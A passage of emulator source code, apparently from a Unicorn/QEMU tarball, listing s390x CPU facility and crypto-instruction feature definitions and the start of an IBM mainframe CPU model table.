"Multiple-epoch facility") DEF_FEAT(TEST_PENDING_EXT_INTERRUPTION, "tpei", STFL, 144, "Test-pending-external-interruption facility") DEF_FEAT(INSERT_REFERENCE_BITS_MULT, "irbm", STFL, 145, "Insert-reference-bits-multiple facility") DEF_FEAT(MSA_EXT_8, "msa8-base", STFL, 146, "Message-security-assist-extension-8 facility (excluding subfunctions)") DEF_FEAT(CMM_NT, "cmmnt", STFL, 147, "CMM: ESSA-enhancement (no translate) facility") DEF_FEAT(VECTOR_ENH2, "vxeh2", STFL, 148, "Vector Enhancements facility 2") DEF_FEAT(ESORT_BASE, "esort-base", STFL, 150, "Enhanced-sort facility (excluding subfunctions)") DEF_FEAT(DEFLATE_BASE, "deflate-base", STFL, 151, "Deflate-conversion facility (excluding subfunctions)") DEF_FEAT(VECTOR_PACKED_DECIMAL_ENH, "vxpdeh", STFL, 152, "Vector-Packed-Decimal-Enhancement Facility") DEF_FEAT(MSA_EXT_9, "msa9-base", STFL, 155, "Message-security-assist-extension-9 facility (excluding subfunctions)") DEF_FEAT(ETOKEN, "etoken", STFL, 156, "Etoken facility") /* Features exposed via SCLP SCCB Byte 80 - 98 (bit numbers relative to byte-80) */ DEF_FEAT(SIE_GSLS, "gsls", SCLP_CONF_CHAR, 40, "SIE: Guest-storage-limit-suppression facility") DEF_FEAT(ESOP, "esop", SCLP_CONF_CHAR, 46, "Enhanced-suppression-on-protection facility") DEF_FEAT(HPMA2, "hpma2", SCLP_CONF_CHAR, 90, "Host page management assist 2 Facility") /* 91-2 */ DEF_FEAT(SIE_KSS, "kss", SCLP_CONF_CHAR, 151, "SIE: Keyless-subset facility") /* 98-7 */ /* Features exposed via SCLP SCCB Byte 116 - 119 (bit numbers relative to byte-116) */ DEF_FEAT(SIE_64BSCAO, "64bscao", SCLP_CONF_CHAR_EXT, 0, "SIE: 64-bit-SCAO facility") DEF_FEAT(SIE_CMMA, "cmma", SCLP_CONF_CHAR_EXT, 1, "SIE: Collaborative-memory-management assist") DEF_FEAT(SIE_PFMFI, "pfmfi", SCLP_CONF_CHAR_EXT, 9, "SIE: PFMF interpretation facility") DEF_FEAT(SIE_IBS, "ibs", SCLP_CONF_CHAR_EXT, 10, "SIE: Interlock-and-broadcast-suppression facility") /* Features exposed via SCLP CPU info. */ DEF_FEAT(SIE_F2, "sief2", SCLP_CPU, 4, "SIE: interception format 2 (Virtual SIE)") DEF_FEAT(SIE_SKEY, "skey", SCLP_CPU, 5, "SIE: Storage-key facility") DEF_FEAT(SIE_GPERE, "gpereh", SCLP_CPU, 10, "SIE: Guest-PER enhancement facility") DEF_FEAT(SIE_SIIF, "siif", SCLP_CPU, 11, "SIE: Shared IPTE-interlock facility") DEF_FEAT(SIE_SIGPIF, "sigpif", SCLP_CPU, 12, "SIE: SIGP interpretation facility") DEF_FEAT(SIE_IB, "ib", SCLP_CPU, 42, "SIE: Intervention bypass facility") DEF_FEAT(SIE_CEI, "cei", SCLP_CPU, 43, "SIE: Conditional-external-interception facility") /* * Features exposed via no feature bit (but e.g., instruction sensing) * -> the feature bit number is irrelavant */ DEF_FEAT(DAT_ENH_2, "dateh2", MISC, 0, "DAT-enhancement facility 2") DEF_FEAT(CMM, "cmm", MISC, 0, "Collaborative-memory-management facility") DEF_FEAT(AP, "ap", MISC, 0, "AP instructions installed") /* Features exposed via the PLO instruction. */ DEF_FEAT(PLO_CL, "plo-cl", PLO, 0, "PLO Compare and load (32 bit in general registers)") DEF_FEAT(PLO_CLG, "plo-clg", PLO, 1, "PLO Compare and load (64 bit in parameter list)") DEF_FEAT(PLO_CLGR, "plo-clgr", PLO, 2, "PLO Compare and load (32 bit in general registers)") DEF_FEAT(PLO_CLX, "plo-clx", PLO, 3, "PLO Compare and load (128 bit in parameter list)") DEF_FEAT(PLO_CS, "plo-cs", PLO, 4, "PLO Compare and swap (32 bit in general registers)") DEF_FEAT(PLO_CSG, "plo-csg", PLO, 5, "PLO Compare and swap (64 bit in parameter list)") DEF_FEAT(PLO_CSGR, "plo-csgr", PLO, 6, "PLO Compare and swap (32 bit in general registers)") DEF_FEAT(PLO_CSX, "plo-csx", PLO, 7, "PLO Compare and swap (128 bit in parameter list)") DEF_FEAT(PLO_DCS, "plo-dcs", PLO, 8, "PLO Double compare and swap (32 bit in general registers)") DEF_FEAT(PLO_DCSG, "plo-dcsg", PLO, 9, "PLO Double compare and swap (64 bit in parameter list)") DEF_FEAT(PLO_DCSGR, "plo-dcsgr", PLO, 10, "PLO Double compare and swap (32 bit in general registers)") DEF_FEAT(PLO_DCSX, "plo-dcsx", PLO, 11, "PLO Double compare and swap (128 bit in parameter list)") DEF_FEAT(PLO_CSST, "plo-csst", PLO, 12, "PLO Compare and swap and store (32 bit in general registers)") DEF_FEAT(PLO_CSSTG, "plo-csstg", PLO, 13, "PLO Compare and swap and store (64 bit in parameter list)") DEF_FEAT(PLO_CSSTGR, "plo-csstgr", PLO, 14, "PLO Compare and swap and store (32 bit in general registers)") DEF_FEAT(PLO_CSSTX, "plo-csstx", PLO, 15, "PLO Compare and swap and store (128 bit in parameter list)") DEF_FEAT(PLO_CSDST, "plo-csdst", PLO, 16, "PLO Compare and swap and double store (32 bit in general registers)") DEF_FEAT(PLO_CSDSTG, "plo-csdstg", PLO, 17, "PLO Compare and swap and double store (64 bit in parameter list)") DEF_FEAT(PLO_CSDSTGR, "plo-csdstgr", PLO, 18, "PLO Compare and swap and double store (32 bit in general registers)") DEF_FEAT(PLO_CSDSTX, "plo-csdstx", PLO, 19, "PLO Compare and swap and double store (128 bit in parameter list)") DEF_FEAT(PLO_CSTST, "plo-cstst", PLO, 20, "PLO Compare and swap and triple store (32 bit in general registers)") DEF_FEAT(PLO_CSTSTG, "plo-cststg", PLO, 21, "PLO Compare and swap and triple store (64 bit in parameter list)") DEF_FEAT(PLO_CSTSTGR, "plo-cststgr", PLO, 22, "PLO Compare and swap and triple store (32 bit in general registers)") DEF_FEAT(PLO_CSTSTX, "plo-cststx", PLO, 23, "PLO Compare and swap and triple store (128 bit in parameter list)") /* Features exposed via the PTFF instruction. */ DEF_FEAT(PTFF_QTO, "ptff-qto", PTFF, 1, "PTFF Query TOD Offset") DEF_FEAT(PTFF_QSI, "ptff-qsi", PTFF, 2, "PTFF Query Steering Information") DEF_FEAT(PTFF_QPT, "ptff-qpc", PTFF, 3, "PTFF Query Physical Clock") DEF_FEAT(PTFF_QUI, "ptff-qui", PTFF, 4, "PTFF Query UTC Information") DEF_FEAT(PTFF_QTOU, "ptff-qtou", PTFF, 5, "PTFF Query TOD Offset User") DEF_FEAT(PTFF_QSIE, "ptff-qsie", PTFF, 10, "PTFF Query Steering Information Extended") DEF_FEAT(PTFF_QTOUE, "ptff-qtoue", PTFF, 13, "PTFF Query TOD Offset User Extended") DEF_FEAT(PTFF_STO, "ptff-sto", PTFF, 65, "PTFF Set TOD Offset") DEF_FEAT(PTFF_STOU, "ptff-stou", PTFF, 69, "PTFF Set TOD Offset User") DEF_FEAT(PTFF_STOE, "ptff-stoe", PTFF, 73, "PTFF Set TOD Offset Extended") DEF_FEAT(PTFF_STOUE, "ptff-stoue", PTFF, 77, "PTFF Set TOD Offset User Extended") /* Features exposed via the KMAC instruction. */ DEF_FEAT(KMAC_DEA, "kmac-dea", KMAC, 1, "KMAC DEA") DEF_FEAT(KMAC_TDEA_128, "kmac-tdea-128", KMAC, 2, "KMAC TDEA-128") DEF_FEAT(KMAC_TDEA_192, "kmac-tdea-192", KMAC, 3, "KMAC TDEA-192") DEF_FEAT(KMAC_EDEA, "kmac-edea", KMAC, 9, "KMAC Encrypted-DEA") DEF_FEAT(KMAC_ETDEA_128, "kmac-etdea-128", KMAC, 10, "KMAC Encrypted-TDEA-128") DEF_FEAT(KMAC_ETDEA_192, "kmac-etdea-192", KMAC, 11, "KMAC Encrypted-TDEA-192") DEF_FEAT(KMAC_AES_128, "kmac-aes-128", KMAC, 18, "KMAC AES-128") DEF_FEAT(KMAC_AES_192, "kmac-aes-192", KMAC, 19, "KMAC AES-192") DEF_FEAT(KMAC_AES_256, "kmac-aes-256", KMAC, 20, "KMAC AES-256") DEF_FEAT(KMAC_EAES_128, "kmac-eaes-128", KMAC, 26, "KMAC Encrypted-AES-128") DEF_FEAT(KMAC_EAES_192, "kmac-eaes-192", KMAC, 27, "KMAC Encrypted-AES-192") DEF_FEAT(KMAC_EAES_256, "kmac-eaes-256", KMAC, 28, "KMAC Encrypted-AES-256") /* Features exposed via the KMC instruction. */ DEF_FEAT(KMC_DEA, "kmc-dea", KMC, 1, "KMC DEA") DEF_FEAT(KMC_TDEA_128, "kmc-tdea-128", KMC, 2, "KMC TDEA-128") DEF_FEAT(KMC_TDEA_192, "kmc-tdea-192", KMC, 3, "KMC TDEA-192") DEF_FEAT(KMC_EDEA, "kmc-edea", KMC, 9, "KMC Encrypted-DEA") DEF_FEAT(KMC_ETDEA_128, "kmc-etdea-128", KMC, 10, "KMC Encrypted-TDEA-128") DEF_FEAT(KMC_ETDEA_192, "kmc-etdea-192", KMC, 11, "KMC Encrypted-TDEA-192") DEF_FEAT(KMC_AES_128, "kmc-aes-128", KMC, 18, "KMC AES-128") DEF_FEAT(KMC_AES_192, "kmc-aes-192", KMC, 19, "KMC AES-192") DEF_FEAT(KMC_AES_256, "kmc-aes-256", KMC, 20, "KMC AES-256") DEF_FEAT(KMC_EAES_128, "kmc-eaes-128", KMC, 26, "KMC Encrypted-AES-128") DEF_FEAT(KMC_EAES_192, "kmc-eaes-192", KMC, 27, "KMC Encrypted-AES-192") DEF_FEAT(KMC_EAES_256, "kmc-eaes-256", KMC, 28, "KMC Encrypted-AES-256") DEF_FEAT(KMC_PRNG, "kmc-prng", KMC, 67, "KMC PRNG") /* Features exposed via the KM instruction. */ DEF_FEAT(KM_DEA, "km-dea", KM, 1, "KM DEA") DEF_FEAT(KM_TDEA_128, "km-tdea-128", KM, 2, "KM TDEA-128") DEF_FEAT(KM_TDEA_192, "km-tdea-192", KM, 3, "KM TDEA-192") DEF_FEAT(KM_EDEA, "km-edea", KM, 9, "KM Encrypted-DEA") DEF_FEAT(KM_ETDEA_128, "km-etdea-128", KM, 10, "KM Encrypted-TDEA-128") DEF_FEAT(KM_ETDEA_192, "km-etdea-192", KM, 11, "KM Encrypted-TDEA-192") DEF_FEAT(KM_AES_128, "km-aes-128", KM, 18, "KM AES-128") DEF_FEAT(KM_AES_192, "km-aes-192", KM, 19, "KM AES-192") DEF_FEAT(KM_AES_256, "km-aes-256", KM, 20, "KM AES-256") DEF_FEAT(KM_EAES_128, "km-eaes-128", KM, 26, "KM Encrypted-AES-128") DEF_FEAT(KM_EAES_192, "km-eaes-192", KM, 27, "KM Encrypted-AES-192") DEF_FEAT(KM_EAES_256, "km-eaes-256", KM, 28, "KM Encrypted-AES-256") DEF_FEAT(KM_XTS_AES_128, "km-xts-aes-128", KM, 50, "KM XTS-AES-128") DEF_FEAT(KM_XTS_AES_256, "km-xts-aes-256", KM, 52, "KM XTS-AES-256") DEF_FEAT(KM_XTS_EAES_128, "km-xts-eaes-128", KM, 58, "KM XTS-Encrypted-AES-128") DEF_FEAT(KM_XTS_EAES_256, "km-xts-eaes-256", KM, 60, "KM XTS-Encrypted-AES-256") /* Features exposed via the KIMD instruction. */ DEF_FEAT(KIMD_SHA_1, "kimd-sha-1", KIMD, 1, "KIMD SHA-1") DEF_FEAT(KIMD_SHA_256, "kimd-sha-256", KIMD, 2, "KIMD SHA-256") DEF_FEAT(KIMD_SHA_512, "kimd-sha-512", KIMD, 3, "KIMD SHA-512") DEF_FEAT(KIMD_SHA3_224, "kimd-sha3-224", KIMD, 32, "KIMD SHA3-224") DEF_FEAT(KIMD_SHA3_256, "kimd-sha3-256", KIMD, 33, "KIMD SHA3-256") DEF_FEAT(KIMD_SHA3_384, "kimd-sha3-384", KIMD, 34, "KIMD SHA3-384") DEF_FEAT(KIMD_SHA3_512, "kimd-sha3-512", KIMD, 35, "KIMD SHA3-512") DEF_FEAT(KIMD_SHAKE_128, "kimd-shake-128", KIMD, 36, "KIMD SHAKE-128") DEF_FEAT(KIMD_SHAKE_256, "kimd-shake-256", KIMD, 37, "KIMD SHAKE-256") DEF_FEAT(KIMD_GHASH, "kimd-ghash", KIMD, 65, "KIMD GHASH") /* Features exposed via the KLMD instruction. */ DEF_FEAT(KLMD_SHA_1, "klmd-sha-1", KLMD, 1, "KLMD SHA-1") DEF_FEAT(KLMD_SHA_256, "klmd-sha-256", KLMD, 2, "KLMD SHA-256") DEF_FEAT(KLMD_SHA_512, "klmd-sha-512", KLMD, 3, "KLMD SHA-512") DEF_FEAT(KLMD_SHA3_224, "klmd-sha3-224", KLMD, 32, "KLMD SHA3-224") DEF_FEAT(KLMD_SHA3_256, "klmd-sha3-256", KLMD, 33, "KLMD SHA3-256") DEF_FEAT(KLMD_SHA3_384, "klmd-sha3-384", KLMD, 34, "KLMD SHA3-384") DEF_FEAT(KLMD_SHA3_512, "klmd-sha3-512", KLMD, 35, "KLMD SHA3-512") DEF_FEAT(KLMD_SHAKE_128, "klmd-shake-128", KLMD, 36, "KLMD SHAKE-128") DEF_FEAT(KLMD_SHAKE_256, "klmd-shake-256", KLMD, 37, "KLMD SHAKE-256") /* Features exposed via the PCKMO instruction. */ DEF_FEAT(PCKMO_EDEA, "pckmo-edea", PCKMO, 1, "PCKMO Encrypted-DEA-Key") DEF_FEAT(PCKMO_ETDEA_128, "pckmo-etdea-128", PCKMO, 2, "PCKMO Encrypted-TDEA-128-Key") DEF_FEAT(PCKMO_ETDEA_256, "pckmo-etdea-192", PCKMO, 3, "PCKMO Encrypted-TDEA-192-Key") DEF_FEAT(PCKMO_AES_128, "pckmo-aes-128", PCKMO, 18, "PCKMO Encrypted-AES-128-Key") DEF_FEAT(PCKMO_AES_192, "pckmo-aes-192", PCKMO, 19, "PCKMO Encrypted-AES-192-Key") DEF_FEAT(PCKMO_AES_256, "pckmo-aes-256", PCKMO, 20, "PCKMO Encrypted-AES-256-Key") DEF_FEAT(PCKMO_ECC_P256, "pckmo-ecc-p256", PCKMO, 32, "PCKMO Encrypt-ECC-P256-Key") DEF_FEAT(PCKMO_ECC_P384, "pckmo-ecc-p384", PCKMO, 33, "PCKMO Encrypt-ECC-P384-Key") DEF_FEAT(PCKMO_ECC_P521, "pckmo-ecc-p521", PCKMO, 34, "PCKMO Encrypt-ECC-P521-Key") DEF_FEAT(PCKMO_ECC_ED25519, "pckmo-ecc-ed25519", PCKMO, 40 , "PCKMO Encrypt-ECC-Ed25519-Key") DEF_FEAT(PCKMO_ECC_ED448, "pckmo-ecc-ed448", PCKMO, 41 , "PCKMO Encrypt-ECC-Ed448-Key") /* Features exposed via the KMCTR instruction. */ DEF_FEAT(KMCTR_DEA, "kmctr-dea", KMCTR, 1, "KMCTR DEA") DEF_FEAT(KMCTR_TDEA_128, "kmctr-tdea-128", KMCTR, 2, "KMCTR TDEA-128") DEF_FEAT(KMCTR_TDEA_192, "kmctr-tdea-192", KMCTR, 3, "KMCTR TDEA-192") DEF_FEAT(KMCTR_EDEA, "kmctr-edea", KMCTR, 9, "KMCTR Encrypted-DEA") DEF_FEAT(KMCTR_ETDEA_128, "kmctr-etdea-128", KMCTR, 10, "KMCTR Encrypted-TDEA-128") DEF_FEAT(KMCTR_ETDEA_192, "kmctr-etdea-192", KMCTR, 11, "KMCTR Encrypted-TDEA-192") DEF_FEAT(KMCTR_AES_128, "kmctr-aes-128", KMCTR, 18, "KMCTR AES-128") DEF_FEAT(KMCTR_AES_192, "kmctr-aes-192", KMCTR, 19, "KMCTR AES-192") DEF_FEAT(KMCTR_AES_256, "kmctr-aes-256", KMCTR, 20, "KMCTR AES-256") DEF_FEAT(KMCTR_EAES_128, "kmctr-eaes-128", KMCTR, 26, "KMCTR Encrypted-AES-128") DEF_FEAT(KMCTR_EAES_192, "kmctr-eaes-192", KMCTR, 27, "KMCTR Encrypted-AES-192") DEF_FEAT(KMCTR_EAES_256, "kmctr-eaes-256", KMCTR, 28, "KMCTR Encrypted-AES-256") /* Features exposed via the KMF instruction. */ DEF_FEAT(KMF_DEA, "kmf-dea", KMF, 1, "KMF DEA") DEF_FEAT(KMF_TDEA_128, "kmf-tdea-128", KMF, 2, "KMF TDEA-128") DEF_FEAT(KMF_TDEA_192, "kmf-tdea-192", KMF, 3, "KMF TDEA-192") DEF_FEAT(KMF_EDEA, "kmf-edea", KMF, 9, "KMF Encrypted-DEA") DEF_FEAT(KMF_ETDEA_128, "kmf-etdea-128", KMF, 10, "KMF Encrypted-TDEA-128") DEF_FEAT(KMF_ETDEA_192, "kmf-etdea-192", KMF, 11, "KMF Encrypted-TDEA-192") DEF_FEAT(KMF_AES_128, "kmf-aes-128", KMF, 18, "KMF AES-128") DEF_FEAT(KMF_AES_192, "kmf-aes-192", KMF, 19, "KMF AES-192") DEF_FEAT(KMF_AES_256, "kmf-aes-256", KMF, 20, "KMF AES-256") DEF_FEAT(KMF_EAES_128, "kmf-eaes-128", KMF, 26, "KMF Encrypted-AES-128") DEF_FEAT(KMF_EAES_192, "kmf-eaes-192", KMF, 27, "KMF Encrypted-AES-192") DEF_FEAT(KMF_EAES_256, "kmf-eaes-256", KMF, 28, "KMF Encrypted-AES-256") /* Features exposed via the KMO instruction. */ DEF_FEAT(KMO_DEA, "kmo-dea", KMO, 1, "KMO DEA") DEF_FEAT(KMO_TDEA_128, "kmo-tdea-128", KMO, 2, "KMO TDEA-128") DEF_FEAT(KMO_TDEA_192, "kmo-tdea-192", KMO, 3, "KMO TDEA-192") DEF_FEAT(KMO_EDEA, "kmo-edea", KMO, 9, "KMO Encrypted-DEA") DEF_FEAT(KMO_ETDEA_128, "kmo-etdea-128", KMO, 10, "KMO Encrypted-TDEA-128") DEF_FEAT(KMO_ETDEA_192, "kmo-etdea-192", KMO, 11, "KMO Encrypted-TDEA-192") DEF_FEAT(KMO_AES_128, "kmo-aes-128", KMO, 18, "KMO AES-128") DEF_FEAT(KMO_AES_192, "kmo-aes-192", KMO, 19, "KMO AES-192") DEF_FEAT(KMO_AES_256, "kmo-aes-256", KMO, 20, "KMO AES-256") DEF_FEAT(KMO_EAES_128, "kmo-eaes-128", KMO, 26, "KMO Encrypted-AES-128") DEF_FEAT(KMO_EAES_192, "kmo-eaes-192", KMO, 27, "KMO Encrypted-AES-192") DEF_FEAT(KMO_EAES_256, "kmo-eaes-256", KMO, 28, "KMO Encrypted-AES-256") /* Features exposed via the PCC instruction. */ DEF_FEAT(PCC_CMAC_DEA, "pcc-cmac-dea", PCC, 1, "PCC Compute-Last-Block-CMAC-Using-DEA") DEF_FEAT(PCC_CMAC_TDEA_128, "pcc-cmac-tdea-128", PCC, 2, "PCC Compute-Last-Block-CMAC-Using-TDEA-128") DEF_FEAT(PCC_CMAC_TDEA_192, "pcc-cmac-tdea-192", PCC, 3, "PCC Compute-Last-Block-CMAC-Using-TDEA-192") DEF_FEAT(PCC_CMAC_ETDEA_128, "pcc-cmac-edea", PCC, 9, "PCC Compute-Last-Block-CMAC-Using-Encrypted-DEA") DEF_FEAT(PCC_CMAC_ETDEA_192, "pcc-cmac-etdea-128", PCC, 10, "PCC Compute-Last-Block-CMAC-Using-Encrypted-TDEA-128") DEF_FEAT(PCC_CMAC_TDEA, "pcc-cmac-etdea-192", PCC, 11, "PCC Compute-Last-Block-CMAC-Using-EncryptedTDEA-192") DEF_FEAT(PCC_CMAC_AES_128, "pcc-cmac-aes-128", PCC, 18, "PCC Compute-Last-Block-CMAC-Using-AES-128") DEF_FEAT(PCC_CMAC_AES_192, "pcc-cmac-aes-192", PCC, 19, "PCC Compute-Last-Block-CMAC-Using-AES-192") DEF_FEAT(PCC_CMAC_AES_256, "pcc-cmac-eaes-256", PCC, 20, "PCC Compute-Last-Block-CMAC-Using-AES-256") DEF_FEAT(PCC_CMAC_EAES_128, "pcc-cmac-eaes-128", PCC, 26, "PCC Compute-Last-Block-CMAC-Using-Encrypted-AES-128") DEF_FEAT(PCC_CMAC_EAES_192, "pcc-cmac-eaes-192", PCC, 27, "PCC Compute-Last-Block-CMAC-Using-Encrypted-AES-192") DEF_FEAT(PCC_CMAC_EAES_256, "pcc-cmac-eaes-256", PCC, 28, "PCC Compute-Last-Block-CMAC-Using-Encrypted-AES-256") DEF_FEAT(PCC_XTS_AES_128, "pcc-xts-aes-128", PCC, 50, "PCC Compute-XTS-Parameter-Using-AES-128") DEF_FEAT(PCC_XTS_AES_256, "pcc-xts-aes-256", PCC, 52, "PCC Compute-XTS-Parameter-Using-AES-256") DEF_FEAT(PCC_XTS_EAES_128, "pcc-xts-eaes-128", PCC, 58, "PCC Compute-XTS-Parameter-Using-Encrypted-AES-128") DEF_FEAT(PCC_XTS_EAES_256, "pcc-xts-eaes-256", PCC, 60, "PCC Compute-XTS-Parameter-Using-Encrypted-AES-256") DEF_FEAT(PCC_SCALAR_MULT_P256, "pcc-scalar-mult-p256", PCC, 64, "PCC Scalar-Multiply-P256") DEF_FEAT(PCC_SCALAR_MULT_P384, "pcc-scalar-mult-p384", PCC, 65, "PCC Scalar-Multiply-P384") DEF_FEAT(PCC_SCALAR_MULT_P512, "pcc-scalar-mult-p521", PCC, 66, "PCC Scalar-Multiply-P521") DEF_FEAT(PCC_SCALAR_MULT_ED25519, "pcc-scalar-mult-ed25519", PCC, 72, "PCC Scalar-Multiply-Ed25519") DEF_FEAT(PCC_SCALAR_MULT_ED448, "pcc-scalar-mult-ed448", PCC, 73, "PCC Scalar-Multiply-Ed448") DEF_FEAT(PCC_SCALAR_MULT_X25519, "pcc-scalar-mult-x25519", PCC, 80, "PCC Scalar-Multiply-X25519") DEF_FEAT(PCC_SCALAR_MULT_X448, "pcc-scalar-mult-x448", PCC, 81, "PCC Scalar-Multiply-X448") /* Features exposed via the PPNO/PRNO instruction. */ DEF_FEAT(PPNO_SHA_512_DRNG, "ppno-sha-512-drng", PPNO, 3, "PPNO SHA-512-DRNG") DEF_FEAT(PRNO_TRNG_QRTCR, "prno-trng-qrtcr", PPNO, 112, "PRNO TRNG-Query-Raw-to-Conditioned-Ratio") DEF_FEAT(PRNO_TRNG, "prno-trng", PPNO, 114, "PRNO TRNG") /* Features exposed via the KMA instruction. */ DEF_FEAT(KMA_GCM_AES_128, "kma-gcm-aes-128", KMA, 18, "KMA GCM-AES-128") DEF_FEAT(KMA_GCM_AES_192, "kma-gcm-aes-192", KMA, 19, "KMA GCM-AES-192") DEF_FEAT(KMA_GCM_AES_256, "kma-gcm-aes-256", KMA, 20, "KMA GCM-AES-256") DEF_FEAT(KMA_GCM_EAES_128, "kma-gcm-eaes-128", KMA, 26, "KMA GCM-Encrypted-AES-128") DEF_FEAT(KMA_GCM_EAES_192, "kma-gcm-eaes-192", KMA, 27, "KMA GCM-Encrypted-AES-192") DEF_FEAT(KMA_GCM_EAES_256, "kma-gcm-eaes-256", KMA, 28, "KMA GCM-Encrypted-AES-256") /* Features exposed via the KDSA instruction. */ DEF_FEAT(KDSA_ECDSA_VERIFY_P256, "kdsa-ecdsa-verify-p256", KDSA, 1, "KDSA ECDSA-Verify-P256") DEF_FEAT(KDSA_ECDSA_VERIFY_P384, "kdsa-ecdsa-verify-p384", KDSA, 2, "KDSA ECDSA-Verify-P384") DEF_FEAT(KDSA_ECDSA_VERIFY_P512, "kdsa-ecdsa-verify-p521", KDSA, 3, "KDSA ECDSA-Verify-P521") DEF_FEAT(KDSA_ECDSA_SIGN_P256, "kdsa-ecdsa-sign-p256", KDSA, 9, "KDSA ECDSA-Sign-P256") DEF_FEAT(KDSA_ECDSA_SIGN_P384, "kdsa-ecdsa-sign-p384", KDSA, 10, "KDSA ECDSA-Sign-P384") DEF_FEAT(KDSA_ECDSA_SIGN_P512, "kdsa-ecdsa-sign-p521", KDSA, 11, "KDSA ECDSA-Sign-P521") DEF_FEAT(KDSA_EECDSA_SIGN_P256, "kdsa-eecdsa-sign-p256", KDSA, 17, "KDSA Encrypted-ECDSA-Sign-P256") DEF_FEAT(KDSA_EECDSA_SIGN_P384, "kdsa-eecdsa-sign-p384", KDSA, 18, "KDSA Encrypted-ECDSA-Sign-P384") DEF_FEAT(KDSA_EECDSA_SIGN_P512, "kdsa-eecdsa-sign-p521", KDSA, 19, "KDSA Encrypted-ECDSA-Sign-P521") DEF_FEAT(KDSA_EDDSA_VERIFY_ED25519, "kdsa-eddsa-verify-ed25519", KDSA, 32, "KDSA EdDSA-Verify-Ed25519") DEF_FEAT(KDSA_EDDSA_VERIFY_ED448, "kdsa-eddsa-verify-ed448", KDSA, 36, "KDSA EdDSA-Verify-Ed448") DEF_FEAT(KDSA_EDDSA_SIGN_ED25519, "kdsa-eddsa-sign-ed25519", KDSA, 40, "KDSA EdDSA-Sign-Ed25519") DEF_FEAT(KDSA_EDDSA_SIGN_ED448, "kdsa-eddsa-sign-ed448", KDSA, 44, "KDSA EdDSA-Sign-Ed448") DEF_FEAT(KDSA_EEDDSA_SIGN_ED25519, "kdsa-eeddsa-sign-ed25519", KDSA, 48, "KDSA Encrypted-EdDSA-Sign-Ed25519") DEF_FEAT(KDSA_EEDDSA_SIGN_ED448, "kdsa-eeddsa-sign-ed448", KDSA, 52, "KDSA Encrypted-EdDSA-Sign-Ed448") /* Features exposed via the SORTL instruction. */ DEF_FEAT(SORTL_SFLR, "sortl-sflr", SORTL, 1, "SORTL SFLR") DEF_FEAT(SORTL_SVLR, "sortl-svlr", SORTL, 2, "SORTL SVLR") DEF_FEAT(SORTL_32, "sortl-32", SORTL, 130, "SORTL 32 input lists") DEF_FEAT(SORTL_128, "sortl-128", SORTL, 132, "SORTL 128 input lists") DEF_FEAT(SORTL_F0, "sortl-f0", SORTL, 192, "SORTL format 0 parameter-block") /* Features exposed via the DEFLATE instruction. */ DEF_FEAT(DEFLATE_GHDT, "dfltcc-gdht", DFLTCC, 1, "DFLTCC GDHT") DEF_FEAT(DEFLATE_CMPR, "dfltcc-cmpr", DFLTCC, 2, "DFLTCC CMPR") DEF_FEAT(DEFLATE_XPND, "dfltcc-xpnd", DFLTCC, 4, "DFLTCC XPND") DEF_FEAT(DEFLATE_F0, "dfltcc-f0", DFLTCC, 192, "DFLTCC format 0 parameter-block") ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/cpu_models.c��������������������������������������������������������0000664�0000000�0000000�00000042475�14675241067�0020641�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * CPU models for s390x * * Copyright 2016 IBM Corp. * * Author(s): David Hildenbrand <dahi@linux.vnet.ibm.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "sysemu/tcg.h" #include "qemu-common.h" //#include "hw/pci/pci.h" #define CPUDEF_INIT(_type, _gen, _ec_ga, _mha_pow, _hmfai, _name, _desc) \ { \ .name = _name, \ .type = _type, \ .gen = _gen, \ .ec_ga = _ec_ga, \ .mha_pow = _mha_pow, \ .hmfai = _hmfai, \ .desc = _desc, \ .base_init = { S390_FEAT_LIST_GEN ## _gen ## _GA ## _ec_ga ## _BASE }, \ .default_init = { S390_FEAT_LIST_GEN ## _gen ## _GA ## _ec_ga ## _DEFAULT }, \ .full_init = { S390_FEAT_LIST_GEN ## _gen ## _GA ## _ec_ga ## _FULL }, \ } /* * CPU definition list in order of release. Up to generation 14 base features * of a following release have been a superset of the previous release. With * generation 15 one base feature and one optional feature have been deprecated. */ static S390CPUDef s390_cpu_defs[] = { CPUDEF_INIT(0x2064, 7, 1, 38, 0x00000000U, "z900", "IBM zSeries 900 GA1"), CPUDEF_INIT(0x2064, 7, 2, 38, 0x00000000U, "z900.2", "IBM zSeries 900 GA2"), CPUDEF_INIT(0x2064, 7, 3, 38, 0x00000000U, "z900.3", "IBM zSeries 900 GA3"), CPUDEF_INIT(0x2066, 7, 3, 38, 0x00000000U, "z800", "IBM zSeries 800 GA1"), CPUDEF_INIT(0x2084, 8, 1, 38, 0x00000000U, "z990", "IBM zSeries 990 GA1"), CPUDEF_INIT(0x2084, 8, 2, 38, 0x00000000U, "z990.2", "IBM zSeries 990 GA2"), CPUDEF_INIT(0x2084, 8, 3, 38, 0x00000000U, "z990.3", "IBM zSeries 990 GA3"), CPUDEF_INIT(0x2086, 8, 3, 38, 0x00000000U, "z890", "IBM zSeries 880 GA1"), CPUDEF_INIT(0x2084, 8, 4, 38, 0x00000000U, "z990.4", "IBM zSeries 990 GA4"), CPUDEF_INIT(0x2086, 8, 4, 38, 0x00000000U, "z890.2", "IBM zSeries 880 GA2"), CPUDEF_INIT(0x2084, 8, 5, 38, 0x00000000U, "z990.5", "IBM zSeries 990 GA5"), CPUDEF_INIT(0x2086, 8, 5, 38, 0x00000000U, "z890.3", "IBM zSeries 880 GA3"), CPUDEF_INIT(0x2094, 9, 1, 40, 0x00000000U, "z9EC", "IBM System z9 EC GA1"), CPUDEF_INIT(0x2094, 9, 2, 40, 0x00000000U, "z9EC.2", "IBM System z9 EC GA2"), CPUDEF_INIT(0x2096, 9, 2, 40, 0x00000000U, "z9BC", "IBM System z9 BC GA1"), CPUDEF_INIT(0x2094, 9, 3, 40, 0x00000000U, "z9EC.3", "IBM System z9 EC GA3"), CPUDEF_INIT(0x2096, 9, 3, 40, 0x00000000U, "z9BC.2", "IBM System z9 BC GA2"), CPUDEF_INIT(0x2097, 10, 1, 43, 0x00000000U, "z10EC", "IBM System z10 EC GA1"), CPUDEF_INIT(0x2097, 10, 2, 43, 0x00000000U, "z10EC.2", "IBM System z10 